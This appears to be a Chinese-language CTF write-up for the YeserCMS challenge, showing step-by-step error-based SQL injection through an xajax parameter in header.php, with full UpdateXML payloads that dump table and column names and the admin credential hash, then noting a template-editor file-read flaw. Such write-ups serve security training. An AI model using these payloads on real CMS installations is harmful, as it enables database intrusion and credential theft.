“百度杯”CTF比賽 九月場_YeserCMS
阿新 • • 發佈:2018-04-14
AD query live username 發現 data tps 報錯 註入
題目在i春秋ctf大本營
題目的提示並沒有什麽卵用,打開鏈接發現其實是easycms,百度可以查到許多通用漏洞
這裏我利用的是無限報錯註入
訪問url/celive/live/header.php,直接進行報錯註入
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx‘,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
繼續POST,拿表
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx‘,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
這裏出現了一個尷尬的問題,顯示的長度不夠了,通過調整1,32的1來調整,這裏因為裏面的表實在太多了(也不知道大佬們是怎麽精準定位yesercms_user的表的),接著跑一下字段
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx‘,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name=‘yesercms_user‘),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
最後爆用戶密碼:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
這裏md5的長度也不夠,還是需要調整1,32來查看完整的md5
拿到賬號密碼admin|ff512d4240cbbdeafada404677ccbe61,解密後得到明文:Yeser231
登錄admin賬號來到後臺管理界面,瘋狂的尋找上傳點,發現好像並沒卵用,試著在文件中寫一句話好像也並不能成功,看了wp,才知道在當前模板編輯處存在文件讀取漏洞
“百度杯”CTF比賽 九月場_YeserCMS